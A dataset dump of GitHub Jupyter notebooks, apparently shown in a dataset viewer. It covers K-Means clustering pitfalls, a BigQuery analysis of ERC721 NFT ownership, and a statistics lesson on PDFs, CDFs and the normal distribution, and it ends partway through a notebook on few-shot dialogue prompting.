text stringlengths 2.5k 6.39M | kind stringclasses 3
values |
|---|---|
# K-Means Clustering: What can go wrong?
In this notebook, we will take a look at few cases, where _KMC_ algorithm does not perform well or may produce unintuitive results.
In particular, we will look at the following scenarios:
1. Our guess on the number of (real) clusters is off.
2. Feature space is highly dimensional.
3. The clusters come in strange shapes.
All of these conditions can lead to problems with K-Means, so let's have a look.
```
%pylab inline
from sklearn import datasets
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs, make_circles, make_moons
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import pandas as pd
import itertools
```
## Wrong number of clusters
To make it easier, let's define a helper function `compare`, which will create and solve the clustering problem for us and then compare the results.
```
def compare(N_features, C_centers, K_clusters, dims=[0, 1], *args):
data, targets = make_blobs(
n_samples=n_samples if 'n_samples' in args else 400,
n_features=N_features,
centers=C_centers,
cluster_std=cluster_std if 'cluster_std' in args else 0.5,
shuffle=True,
random_state=random_state if 'random_state' in args else 0)
FEATS = ['x' + str(x) for x in range(N_features)]
X = pd.DataFrame(data, columns=FEATS)
X['cluster'] = KMeans(n_clusters=K_clusters, random_state=0).fit_predict(X)
fig, axs = plt.subplots(1, 2, figsize=(12, 4))
axs[0].scatter(data[:, dims[0]], data[:, dims[1]],
c='white', marker='o', edgecolor='black', s=20)
axs[0].set_xlabel('x{} [a.u.]'.format(dims[0]))
axs[0].set_ylabel('x{} [a.u.]'.format(dims[1]))
axs[0].set_title('Original dataset')
axs[1].set_xlabel('x{} [a.u.]'.format(dims[0]))
axs[1].set_ylabel('x{} [a.u.]'.format(dims[1]))
axs[1].set_title('Applying clustering')
colors = itertools.cycle(['r', 'g', 'b', 'm', 'c', 'y'])
for k in range(K_clusters):
x = X[X['cluster'] == k][FEATS].to_numpy()
axs[1].scatter(x[:, dims[0]], x[:, dims[1]], color=next(colors), edgecolor='k', alpha=0.5)
plt.show()
```
### Too few clusters
```
compare(2, 4, 3)
compare(2, 4, 2)
```
Despite having distinct clusters in the data, we underestimated their number.
As a consequence, some disjoint groups of data are forced to fit into one larger cluster.
### Too many clusters
```
compare(2, 2, 3)
compare(2, 2, 4)
```
In contrary to the last situation, trying to wrap the data into too many clusters creates artificial boundaries within real data clusters.
## High(er) dimensional data
A dataset does not need to be that high in dimentionality before we begin to see problems.
Although visualization and thus somewhat analysis of highly dimentional data is already challenging (cursing now...), as KMC is often used to gain insight into the data, it does not help to be presented with ambiguities.
To explain the point, let's generate a three-dimensional dataset with clearly distinct clusters.
```
fig = plt.figure(figsize=(14, 8))
ax = fig.add_subplot(111, projection='3d')
data, targets = make_blobs(
n_samples=400,
n_features=3,
centers=3,
cluster_std=0.5,
shuffle=True,
random_state=0)
ax.scatter(data[:, 0], data[:, 1],
zs=data[:, 2], zdir='z', s=25, c='black', depthshade=True)
ax.set_xlabel('x0 [a.u.]')
ax.set_ylabel('x1 [a.u.]')
ax.set_zlabel('x2 [a.u.]')
ax.set_title('Original distribution.')
plt.grid()
plt.show()
```
Although there are infinitely many ways we can project this 3D dataset onto 2D, there are three primary orthogonal sub-spaces:
* `x0 : x1`
* `x1 : x2`
* `x2 : x0`
Looking at the `x2 : x0` projection, the dataset looks like as if it only had two clusters. The lower-right "supercluster" is in fact two distinct groups and even if we guess _K_ right (`K = 3`), it looks like an apparent error, despite the clusters are very localized.
```
compare(3, 3, 3, dims=[0, 2])
```
To be sure, we have to look at the remaining projections to see the problem, literally, from different angles.
```
compare(3, 3, 3, dims=[1, 2])
compare(3, 3, 3, dims=[0, 1])
```
This makes more sense!
On the flip side, we had an incredible advantage.
First, with three dimensions, we were actually able to plot the entire dataset.
Secondly, the clusters that exist within the dataset were actually very distinct thus easy to spot.
Finally, the with three dimensional dataset, we were facing only three standard 2D projections.
In case of _N, N > 3_ features, we would **not be able to plot the whole dataset**, and the number of 2D projections would scale quadratically with _N_:
$$\text{number of 2D projections} = \frac{N (N - 1)}{2}$$
not to mention that the dataset may have strangely shaped or non-localized clusters, which is our next challenge.
## Irregular datasets
So far we mentioned problems that are on "our side".
We looked at a very "well-behaved" dataset and discussed issues on the analytics side.
However, what about if the dataset does not fit our solution, or, our **solution actually does not fit the problem?**
This is excatly the case, where data distribution comes in strange or irregular shapes.
Being presented with just this graph, we may be tricked into believing that there are only two clusters in the data.
However, when plotting the remaining projections, we quickly learn that this is not true.
```
fig, axs = plt.subplots(1, 3, figsize=(14, 4))
# unequal variance
X, y = make_blobs(n_samples=1400,
cluster_std=[1.0, 2.5, 0.2],
random_state=2)
y_pred = KMeans(n_clusters=3, random_state=2).fit_predict(X)
colors = [['r', 'g', 'b'][c] for c in y_pred]
axs[0].scatter(X[:, 0], X[:, 1], color=colors, edgecolor='k', alpha=0.5)
axs[0].set_title("Unequal Variance")
# anisotropically distributed data
X, y = make_blobs(n_samples=1400, random_state=156)
transformation = [[0.60834549, -0.63667341], [-0.40887718, 0.85253229]]
X = np.dot(X, transformation)
y_pred = KMeans(n_clusters=3, random_state=0).fit_predict(X)
colors = [['r', 'g', 'b'][c] for c in y_pred]
axs[1].scatter(X[:, 0], X[:, 1], color=colors, edgecolor='k', alpha=0.5)
axs[1].set_title("Anisotropicly Distributed Blobs")
# irregular shaped data
X, y = make_moons(n_samples=1400, shuffle=True, noise=0.1, random_state=120)
y_pred = KMeans(n_clusters=2, random_state=0).fit_predict(X)
colors = [['r', 'g', 'b'][c] for c in y_pred]
axs[2].scatter(X[:, 0], X[:, 1], color=colors, edgecolor='k', alpha=0.5)
axs[2].set_title("Irregular Shaped Data")
plt.show()
```
The left graph shows data whose distribution although Gaussian, does not have equal standard deviation.
The middle graph presents _anisotropic_ data, meaning data that is elongated along a specific axis.
Finally the right graph shows data that is completely non-Gaussian, despite organized in clear clusters.
In either case, the irregularity makes KMC algorithm underperform.
Since the algorithm treats every data point equaly and completely independently from other points, the algorithm **fails to spot any possible continuity or local variations within a cluser**.
What it does is simply taking the same metrics and applying it to every point.
As a result, the KMC algorithm may produce stange or counter-intuitive clustering within the data even if we guess _K_ correctly and the features _N_ are not that many.
If the data was not so localized around some points already and the number of features were higher, most likely out judgement would be wrong.
## Conclusions
In this notebook we have discussed three main reasons for the K-Means Clustering algorithm to give us wrong answers.
* First, as the number of clusters _K_ needs to be decided a priori, there is a high change that we will guess it wrongly.
* Secondly, clusering in higher dimensional space becomes cumbersome from the analytics point of view, in which case KMC will provide us with insights that may be misleading.
* FInally, for any inrregularly shaped data, KMC is likely to artificial clusters that do not conform to common sense.
Knowing these three fallacies, KMC is still a useful tool, especially when inspecting of the data or constructing labels.
| github_jupyter |
## Masters of the Great Web and Cyberpunks. ERC721 Analysis
```
import pandas as pd
from config import PROJECT_ID, INITIAL_TS, SNAPSHOT_TS, \
ERC721_ANALYSIS_DATASET_NAME, ERC721_AMOUNT_TABLE_NAME, ERC721_ANALYSIS_DISTRIBUTION_TABLE_NAME, \
ERC721_ROW_TRANSFERS_TABLE_NAME, ETHERSCAN_NFT_CSV_NAME, ERC721_NFT_TOKEN_TABLE_NAME, ERC721_TOKEN_TABLE_NAME, \
MASTERS_AUDIENCE, CYBERPUNKS_AUDIENCE
from src.utils_bigquery import drop_table, create_table, get_df, create_table_from_df
from src.utils_charts import grade_boundaries_analysis
from src.extractor_nft_token_list import extract_nft_tokens
EXTRACT_NFT = False
DROP_TABLES = True
CREATE_TABLES = True
min_number_of_tokens = 0
erc721_tokens_manual_grade_2_dict = {
'ENS': '0x57f1887a8bf19b14fc0df6fd9b2acc9af147ea85'}
erc721_tokens_manual_grade_3_dict = {
'Gitcoin Kudos': '0x2aea4add166ebf38b63d09a75de1a7b94aa24163',
'LAND': '0xf87e31492faf9a91b02ee0deaad50d51d56d5d4d'}
erc721_tokens_manual_cyberpunks_dict = {
'Unicorns': '0x89205a3a3b2a69de6dbf7f01ed13b2108b2c43e7',
'DRAGON': '0x960f401aed58668ef476ef02b2a2d43b83c261d8',
'Cryptopunks': '0xb47e3cd837ddf8e4c57f05d70ab865de6e193bbb'}
nft_tokens_without_approvalforall_events = [
'0xdc76a2de1861ea49e8b41a1de1e461085e8f369f',
'0x7f556e211a3e4b57d005d3aa49a31306fa8bb34d',
'0x772da237fc93ded712e5823b497db5991cc6951e',
'0x9ab3ada106afdfae83f13428e40da70b3a22c50c',
'0x729cadcb048d96dacf4133d4418e57241da6a37a',
'0x79f75e9f93f89d33c20573dec03710c6d9ec538d',
'0x6ad0f855c97eb80665f2d0c7d8204895e052c373',
'0x07cdd617c53b07208b0371c93a02deb8d8d49c6e',
'0x06012c8cf97bead5deae237070f9587f8e7a266d',
'0x7fdcd2a1e52f10c28cb7732f46393e297ecadda1',
'0xd2f81cd7a20d60c0d558496c7169a20968389b40',
'0xf7a6e15dfd5cdd9ef12711bd757a9b6021abf643',
'0xdf5d68d54433661b1e5e90a547237ffb0adf6ec2',
'0x663e4229142a27f00bafb5d087e1e730648314c3',
'0x87d598064c736dd0c712d329afcfaa0ccc1921a1',
'0xa98ad92a642570b83b369c4eb70efefe638bc895',
'0x41a322b28d0ff354040e2cbc676f0320d8c8850d',
'0xefabe332d31c3982b76f8630a306c960169bd5b3',
'0x71c118b00759b0851785642541ceb0f4ceea0bd5',
'0xda9f43015749056182352e9dc6d3ee0b6293d80a',
'0xabc7e6c01237e8eef355bba2bf925a730b714d5f',
'0x1b5242794288b45831ce069c9934a29b89af0197',
'0x995020804986274763df9deb0296b754f2659ca1'
]
TRANSFER_256_EVENT_HASH = '0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'
TRANSFER_128_EVENT_HASH = '0x27772adc63db07aae765b71eb2b533064fa781bd57457e1b138592d8198d0959'
TRANSFER_SINGLE_EVENT_HASH = '0xc3d58168c5ae7397731d063d5bbf3d657854427343f4c083240f7aacaa2d0f62'
TRANSFER_BATCH_EVENT_HASH = '0x4a39dc06d4c0dbc64b70af90fd698a233a518aa5d07e595d983b8c0526c8f7fb'
APPROVAL_FOR_ALL_EVENT_HASH = '0x17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31'
MINT_EVENT_HASH = '0x0f6798a560793a54c3bcfe86a93cde1e73087d944c0ea20544137d4121396885'
BURN_EVENT_HASH = '0xcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5'
ENS_NAMEREGISTERED_EVENT_HASH = '0xb3d987963d01b2f68493b4bdb130988f157ea43070d4ad840fee0466ed9370d9'
LAND_TRANSFER_1_EVENT_HASH = '0x8988d59efc2c4547ef86c88f6543963bab0cea94f8e486e619c7c3a790db93be'
LAND_TRANSFER_2_EVENT_HASH = '0xd5c97f2e041b2046be3b4337472f05720760a198f4d7d84980b7155eec7cca6f'
CRYPTOPUNKS_ASSIGN_EVENT_HASH = '0x8a0e37b73a0d9c82e205d4d1a3ff3d0b57ce5f4d7bccf6bac03336dc101cb7ba'
CK_BIRTH_EVENT_HASH = '0x0a5311bd2a6608f08a180df2ee7c5946819a649b204b554bb8e39825b2c50ad5'
EVENTS = {
TRANSFER_256_EVENT_HASH: [1, 2, 3],
TRANSFER_128_EVENT_HASH: [1, 2, 3],
TRANSFER_SINGLE_EVENT_HASH: [2, 3, 4],
TRANSFER_BATCH_EVENT_HASH: [2, 3, 4],
MINT_EVENT_HASH: [0, 1, 2],
BURN_EVENT_HASH: [1, 0, 2],
ENS_NAMEREGISTERED_EVENT_HASH: [0, 2, 1],
LAND_TRANSFER_1_EVENT_HASH: [1, 2, 3],
LAND_TRANSFER_2_EVENT_HASH: [1, 2, 3],
CRYPTOPUNKS_ASSIGN_EVENT_HASH: [0, 1, 2],
CK_BIRTH_EVENT_HASH: [0, 1, 2]
}
EVENTS_HASHES = list(EVENTS.keys())
erc721_tokens_manual_grade_2_tuple_str = str(tuple(erc721_tokens_manual_grade_2_dict.values())).replace(',)', ')')
erc721_tokens_manual_grade_3_tuple_str = str(tuple(erc721_tokens_manual_grade_3_dict.values())).replace(',)', ')')
erc721_tokens_manual_cyberpunks_tuple_str = str(tuple(erc721_tokens_manual_cyberpunks_dict.values())).replace(',)', ')')
```
### Get Transfers
```
query_1 = f'''
WITH logs AS (
SELECT
address as token_address,
topics[SAFE_ORDINAL(1)] as event_hash,
topics,
transaction_hash,
block_number,
data
FROM `bigquery-public-data.crypto_ethereum.logs`
WHERE block_timestamp >= '{INITIAL_TS}'
AND block_timestamp <= '{SNAPSHOT_TS}'
AND topics[SAFE_ORDINAL(1)] IN {tuple(EVENTS_HASHES + [APPROVAL_FOR_ALL_EVENT_HASH])}
),
token_addresses AS (
SELECT
token_address
FROM (
SELECT
token_address,
ARRAY_AGG(DISTINCT event_hash) as event_hashes
FROM logs
GROUP BY token_address
HAVING '{APPROVAL_FOR_ALL_EVENT_HASH}' in UNNEST(event_hashes)
AND ARRAY_LENGTH(event_hashes) > 1
)
UNION ALL
SELECT token_address
FROM UNNEST ({list(erc721_tokens_manual_cyberpunks_dict.values()) + nft_tokens_without_approvalforall_events}) as token_address
),
token_transfers_row AS (
SELECT
token_address,
event_hash,
if(from_argument_number = 0, '0x0000000000000000000000000000000000000000', REPLACE(topics[SAFE_ORDINAL(from_argument_number + 1)], '0x000000000000000000000000', '0x')) as from_address,
if(to_argument_number = 0, '0x0000000000000000000000000000000000000000', REPLACE(topics[SAFE_ORDINAL(to_argument_number + 1)], '0x000000000000000000000000', '0x')) as to_address,
CASE
WHEN ARRAY_LENGTH(topics) >= id_argument_number + 1 THEN [topics[SAFE_ORDINAL(id_argument_number + 1)]]
WHEN event_hash='{TRANSFER_SINGLE_EVENT_HASH}' THEN [LEFT(data, 66)]
WHEN event_hash='{TRANSFER_BATCH_EVENT_HASH}' THEN
(SELECT
ARRAY_AGG(CONCAT('0x', SUBSTR(token_data.token_data, i * 64 + 1, 64)))
FROM (
SELECT SAFE.SUBSTR(data, 64*3+3, CAST((LENGTH(data) - 2 - 64 * 4)/2 AS INT64)) AS token_data) AS token_data
CROSS JOIN
UNNEST (GENERATE_ARRAY(0,CAST(LENGTH(token_data.token_data)/64 - 1 AS INT64))) AS i)
ELSE [data]
END AS token_ids,
CASE
WHEN event_hash='{TRANSFER_SINGLE_EVENT_HASH}' THEN [CAST(REPLACE(CONCAT('0x', RIGHT(data, 64)), '0x000000000000000000000000', '0x') AS FLOAT64)]
WHEN event_hash='{TRANSFER_BATCH_EVENT_HASH}' THEN
(SELECT
ARRAY_AGG(CAST(REPLACE(CONCAT('0x', SUBSTR(token_data.token_data, i * 64 + 1, 64)), '0x000000000000000000000000', '0x') AS FLOAT64))
FROM (
SELECT SAFE.SUBSTR(data, 64*4+3 + CAST((LENGTH(data) - 2 - 64 * 4)/2 AS INT64), CAST((LENGTH(data) - 2 - 64 * 4)/2 AS INT64)) AS token_data) AS token_data
CROSS JOIN
UNNEST (GENERATE_ARRAY(0,CAST(LENGTH(token_data.token_data)/64 - 1 AS int64))) AS i)
ELSE [1.0]
END AS token_values,
data,
transaction_hash,
block_number
FROM logs
INNER JOIN token_addresses USING (token_address)
INNER JOIN (
SELECT
event_hash,
from_argument_number,
to_argument_number,
id_argument_number
FROM UNNEST([{''.join(f"STRUCT('{k}' AS event_hash, {v[0]} AS from_argument_number, {v[1]} AS to_argument_number, {v[2]} AS id_argument_number), " for k,v in EVENTS.items())[:-2]}])
)
USING (event_hash)
)
SELECT DISTINCT
token_address,
from_address,
to_address,
token_ids[SAFE_ORDINAL(id_ordinal)] as token_id,
token_values[SAFE_ORDINAL(id_ordinal)] as token_value,
transaction_hash,
block_number
FROM token_transfers_row,
UNNEST(GENERATE_ARRAY(1, array_length(token_ids))) as id_ordinal
'''
if DROP_TABLES:
drop_table(table_name=ERC721_ROW_TRANSFERS_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
create_table(query=query_1,
table_name=ERC721_ROW_TRANSFERS_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### Get Balances
```
query_2 = f'''
WITH excluding_erc1155_tokens AS (
SELECT DISTINCT
CONCAT(token_address, token_id) as excluding_token
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_ROW_TRANSFERS_TABLE_NAME}`
WHERE token_value > 1
),
token_transfers_without_excluding_erc1155 AS (
SELECT
token_transfers.token_address,
from_address,
to_address,
token_transfers.token_id
transaction_hash
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_ROW_TRANSFERS_TABLE_NAME}` AS token_transfers
WHERE CONCAT(token_address, token_id) NOT IN (SELECT excluding_token FROM excluding_erc1155_tokens)
)
SELECT
token_address,
address,
sum(amount_change) as amount
FROM (
SELECT
token_address,
from_address as address,
- 1 as amount_change
FROM token_transfers_without_excluding_erc1155
UNION ALL
SELECT
token_address,
to_address as address,
1 as amount_change
FROM token_transfers_without_excluding_erc1155)
WHERE address != '0x0000000000000000000000000000000000000000'
AND token_address != address
GROUP BY token_address, address
ORDER BY amount
'''
if DROP_TABLES:
drop_table(table_name=ERC721_AMOUNT_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
create_table(query=query_2,
table_name=ERC721_AMOUNT_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### ERC721 Contracts List
```
if EXTRACT_NFT:
extract_nft_tokens()
if CREATE_TABLES:
nft_tokens_df = pd.read_csv(ETHERSCAN_NFT_CSV_NAME, index_col=0)
nft_tokens_df['token_address'] = nft_tokens_df['token_address'].map(lambda x: x.lower())
create_table_from_df(source_df=nft_tokens_df,
table_name=ERC721_NFT_TOKEN_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME,
drop_existing_table=DROP_TABLES)
query_3 = f'''
WITH tokens AS (
SELECT
token_address,
count(DISTINCT address) as number_of_owners
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_AMOUNT_TABLE_NAME}`
WHERE amount > 0
GROUP BY token_address
),
manual_tokens AS (
SELECT
token.address AS token_address,
token.name AS token_name
FROM UNNEST(
[{''.join(f"STRUCT('{k}' AS name,'{v}' AS address), " for k,v in {**erc721_tokens_manual_grade_2_dict, **erc721_tokens_manual_grade_3_dict, **erc721_tokens_manual_cyberpunks_dict}.items())[:-2]}]
) as token
)
SELECT
token_address as address,
if(manual_tokens.token_name is not null, manual_tokens.token_name, nft_tokens.token_name) as name,
number_of_owners
FROM tokens
LEFT JOIN `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_NFT_TOKEN_TABLE_NAME}` as nft_tokens
USING (token_address)
LEFT JOIN manual_tokens
USING (token_address)
'''
if DROP_TABLES:
drop_table(table_name=ERC721_TOKEN_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
create_table(query=query_3,
table_name=ERC721_TOKEN_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### Analysis of Grade Boundaries. Amount of ERC721 tokens
```
query_4 = f'''
SELECT
sum_amount,
count(address) as number_of_addresses
FROM (
SELECT
address,
count(distinct token_address) as number_of_tokens,
sum(amount) as sum_amount
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_AMOUNT_TABLE_NAME}`
WHERE amount > 0
AND address != '0x0000000000000000000000000000000000000000'
AND address != token_address
GROUP BY address
HAVING sum_amount > {min_number_of_tokens})
GROUP BY sum_amount
'''
address_agg_by_sum_amount_of_tokens_df = get_df(query_4)
boundary_erc721_amount = \
grade_boundaries_analysis(
distribution_df=address_agg_by_sum_amount_of_tokens_df,
value_column = 'sum_amount',
value_chart_label = 'Amount of ERC721 tokens by address, Log10',
value_name = 'Amount of ERC721 tokens',
chart_title = 'Distribution of Addresses by Amount of ERC721 Tokens',
max_show_value = 5000)
```
### Analysis of Grade Boundaries. Fee spending to contracts
Described in the [Extraordinary Hackers and Masters of the Great Web. Gas Analysis](gas__hackers_and_masters.ipynb)
Jupyter notebook
### Distribution Rules. Masters of the Great Web
<table style="text-align: left">
<thead style="text-align: center">
<tr>
<th rowspan=2></th>
<th colspan=3>Grade</th>
</tr>
<tr>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left"> Amount of ERC721 tokens </td>
<td style="text-align: center"> > 0 NFT </td>
<td style="text-align: center"> > 12 NFT </td>
<td style="text-align: center"> > 160 NFT </td>
</tr>
<tr>
<td style="text-align: left"> Owners of the Selected ERC721 tokens </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> ENS </td>
<td style="text-align: center"> Gitcoin Kudos or LAND </td>
</tr>
<tr>
<td style="text-align: left"> Fee spending to contracts<sup>1</sup>, by contract creators, ETH </td>
<td style="text-align: center"> > 0 ETH </td>
<td style="text-align: center"> > 0.004 ETH </td>
<td style="text-align: center"> > 0.477 ETH </td>
</tr>
</tbody>
</table>
<sup>1</sup> including contracts created by factories only
### Distribution Rules. Cyberpunks
<table style="text-align: left">
<thead style="text-align: center">
<tr>
<th rowspan=2></th>
<th colspan=3>Grade</th>
</tr>
<tr>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left"> Owners of the Selected ERC721 tokens </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> Unicorns, DRAGON or Cryptopunks </td>
</tr>
<tr>
<td style="text-align: left"> Urbit Owners </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> - </td>
<td style="text-align: center"> here </td>
</tr>
</tbody>
</table>
### Create Distribution Table for ERC721 Tokens
```
query_4 = f'''
WITH erc721_amount AS (
SELECT
address,
count(distinct token_address) as number_of_tokens,
ARRAY_AGG(DISTINCT token_address) as token_list,
sum(amount) as sum_amount
FROM `{PROJECT_ID}.{ERC721_ANALYSIS_DATASET_NAME}.{ERC721_AMOUNT_TABLE_NAME}`
WHERE amount > 0
AND address != '0x0000000000000000000000000000000000000000'
AND address != token_address
GROUP BY address),
urbit_owners AS (
SELECT
owner,
count(point) as sum_amount
FROM `cosmic-keep-223223.erc721_analysis.azimuth_points`
GROUP BY owner)
SELECT
'{MASTERS_AUDIENCE}' as audience,
CASE
WHEN (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_3_tuple_str}) > 0 THEN 'Owners of the Selected ERC721 tokens'
WHEN (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_2_tuple_str}) > 0 AND sum_amount <= {boundary_erc721_amount[2]} THEN 'Owners of the Selected ERC721 tokens'
ELSE 'Owners of ERC721 tokens'
END
AS segment,
address,
CASE
WHEN sum_amount > {boundary_erc721_amount[2]} OR (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_3_tuple_str}) > 0 THEN 3
WHEN sum_amount > {boundary_erc721_amount[1]} OR (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_grade_2_tuple_str}) > 0 THEN 2
WHEN sum_amount > {boundary_erc721_amount[0]} THEN 1
ELSE null
END
AS grade,
sum_amount,
number_of_tokens
FROM erc721_amount
WHERE number_of_tokens > {min_number_of_tokens}
UNION ALL
SELECT
'{CYBERPUNKS_AUDIENCE}' as audience,
'Owners of the Selected ERC721 tokens' as segment,
address,
3 AS grade,
sum_amount,
number_of_tokens
FROM erc721_amount
WHERE (SELECT COUNT(1) FROM UNNEST(token_list) el WHERE el IN {erc721_tokens_manual_cyberpunks_tuple_str}) > 0
UNION ALL
SELECT
'{CYBERPUNKS_AUDIENCE}' as audience,
'Urbit Owners' as segment,
owner as address,
3 AS grade,
sum_amount,
1 as number_of_tokens
FROM urbit_owners
'''
if DROP_TABLES:
drop_table(table_name=ERC721_ANALYSIS_DISTRIBUTION_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
if CREATE_TABLES:
create_table(query=query_4,
table_name=ERC721_ANALYSIS_DISTRIBUTION_TABLE_NAME,
dataset_name=ERC721_ANALYSIS_DATASET_NAME)
```
### Create Distribution Table for Spending Fee Analysis
Distribution has been calculated in the [Extraordinary Hackers and Masters of the Great Web. Gas Analysis](gas__hackers_and_masters.ipynb) Jupyter notebook.
| github_jupyter |
# Learning Objectives
- At the end of this class, you will be able to write down functions to compute probability density function and cumulative density function
- How can use `scipy.stats` package to compute Survaival Value or CDF Value for a known distribution
```
import numpy as np
import pandas as pd
df = pd.read_csv('../Pandas/titanic.csv')
```
## Probability Distribution Function (PDF)
- PDF has exactly similar pattern to histogram. The only difference is we normalize the value of histogram
- Lets plot the histogram for Age in Titanic
## Activity (Remind Histogram): Plot the Histogram of Age for Titanic Dataset
```
import seaborn as sns
ls_age = df['Age'].dropna()
sns.distplot(ls_age, hist=True, kde=False, bins=16)
```
- Lets now plot the PDF of Age in Titanic
```
import seaborn as sns
sns.distplot(df['Age'].dropna(), hist=True, kde=True, bins=16)
```
## Activity: In PDF, where does the y axes numbers come from? For example at Age 20-25, why the y-value is around 0.030?
```
# custom histogram function
def custom_hist(ls, interval):
hist_ls_dict = dict()
min_ls = np.min(ls)
max_ls = np.max(ls)
print(max_ls)
I = ((max_ls - min_ls) / interval)
print(I)
for j in range(interval):
# print((min_ls + j*I, min_ls + (j+1) *I))
# print(np.sum(((min_ls + j*I) <=ls) & (ls <= (min_ls + (j+1) *I))))
hist_ls_dict[(min_ls + j*I, min_ls + (j+1) *I)]= np.sum(((min_ls + j*I) <=ls) & (ls <= (min_ls + (j+1) *I)))
return hist_ls_dict
print(custom_hist(df['Age'].dropna().values, 16))
hist_dict = custom_hist(df['Age'].dropna().values, 16)
sum(hist_dict.values())
122/714/4.97375
```
## Activity: What percent of passengers are younger than 40?
```
How_many_younger_40 = df[df['Age'] <= 40]
pr_below_40 = len(How_many_younger_40)/len(df['Age'].dropna())
pr_below_40
```
## It is not easy to calculate this percentage from PDF as we should compute the area
## Cumulative Density Function (CDF)
- In above example, we could not easily obtain the percentage from PDF, although it is possible.
- With CDF we can
- Lets learn CDF by example. CDF computation needs two steps:
1 - For a given array of numbers and a given threshold, Count how many elements in the array is less than the threshold
2 - Change the threshold from the minimum to maximum value of the array
```
ls_age = df['Age'].dropna().values
def calculate_cdf(x, threshold):
return np.sum(x <= threshold)
cdf_age = [calculate_cdf(ls_age, r)/len(ls_age) for r in range(int(np.min(ls_age)), int(np.max(ls_age)))]
import matplotlib.pyplot as plt
plt.plot(range(int(np.min(ls_age)), int(np.max(ls_age))), cdf_age)
plt.grid()
```
## Use Seaborn or Matplotlib to plot CDF of Age
```
sns.distplot(df['Age'].dropna(), hist_kws=dict(cumulative=True), kde_kws=dict(cumulative=True))
df['Age'].dropna().hist(cumulative=True, density=True)
```
## More about PDF
```
sns.violinplot(x="Sex", y="Age", data=df)
```
## Normal Distribution
- It is possible that when we plot histogram or PDF of an array, it has Bell Shape
- The name of this histogram is Normal
```
import numpy as np
import seaborn as sns
# Generate 1000 samples with 60 as its mean and 10 as its std
a = np.random.normal(60, 10, 1000)
sns.distplot(a, hist=True, kde=True, bins=20)
```
## Activity:
- The intrsuctor of DS, graded students final exam. He is reporting that the mean was 60 (with scale of 100) with standard deviation of 10. What is the probability that students got more than 70?
```
from scipy.stats import norm
print(norm.sf(70, loc=60, scale=10))
# or
1 - norm.cdf(70, loc=60, scale=10)
```
## Normal Distribution Properties:
When the data is Normally distributed:
- 68% of the data is captured within one standard deviation from the mean.
- 95% of the data is captured within two standard deviations from the mean.
- 99.7% of the data is captured within three standard deviations from the mean.
<br><img src="http://www.oswego.edu/~srp/stats/images/normal_34.gif" /><br>
## Activity:
- Show that about 68% of the values in a are in [50, 70] range
```
norm.cdf(70, loc=60, scale=10) - norm.cdf(50, loc=60, scale=10)
```
## If we scale the Normal Ditribution, the result is zero mean and unit std
```
b = (a - 60)/10
sns.distplot(b, hist=True, kde=True, bins=20)
np.mean(b)
np.std(b)
b -> has z-ditribution
```
## Z-Distribution
- When the samples of our numerical array are Normal with arbitrary mean and std
- If scale each element by subtracting elements from the mean and divide over std, then the new array would be a Normal distribution with zero mean, std 1
- Z-distribution is another name for standard Normal distribution
| github_jupyter |
```
from utils.utils import load_model
from prompts.generic_prompt import load_prefix, load_prefix_by_category, generate_response_interactive
from prompts.image_chat import convert_sample_to_shot_IC_prefix_interact, convert_sample_to_shot_IC_interact
import pprint
import random
pp = pprint.PrettyPrinter(indent=4)
args = type('', (), {})()
args.multigpu = False
device = 0
## To use GPT-Jumbo (178B) set this to true and input your api-key
## Visit https://studio.ai21.com/account for more info
## AI21 provides 10K tokens per day, so you can try only for few turns
api = False
api_key = ''
## This is the config dictionary used to select the template converter
mapper = {
"IC": {"shot_converter":convert_sample_to_shot_IC_prefix_interact,
"shot_converter_inference": convert_sample_to_shot_IC_interact,
"file_data":"data/image_chat/","with_knowledge":False,
"shots":{1024:[0,1,5],2048:[0,1,10]},"max_shot":{1024:5,2048:10},
"shot_separator":"\n\n",
"meta_type":"all_turns_category","gen_len":50,"max_number_turns":2},
}
if api:
from transformers import AutoTokenizer
tokenizer = tokenizer = AutoTokenizer.from_pretrained("gpt2")
model = None
max_seq = 2048
else:
## Load LM and tokenizer
## You can try different LMs:
## gpt2, gpt2-medium, gpt2-large, gpt2-xl,
## EleutherAI/gpt-neo-1.3B, EleutherAI/gpt-neo-2.7B,
## EleutherAI/gpt-j-6B
## the larger the better
model, tokenizer, max_seq = load_model(args,"EleutherAI/gpt-neo-1.3B",device)
## sample time is used to sample different prompts
## we select the zero element of the list
## to change the behaviour you could try different prompts
prefix_dict = load_prefix_by_category(tokenizer=tokenizer,
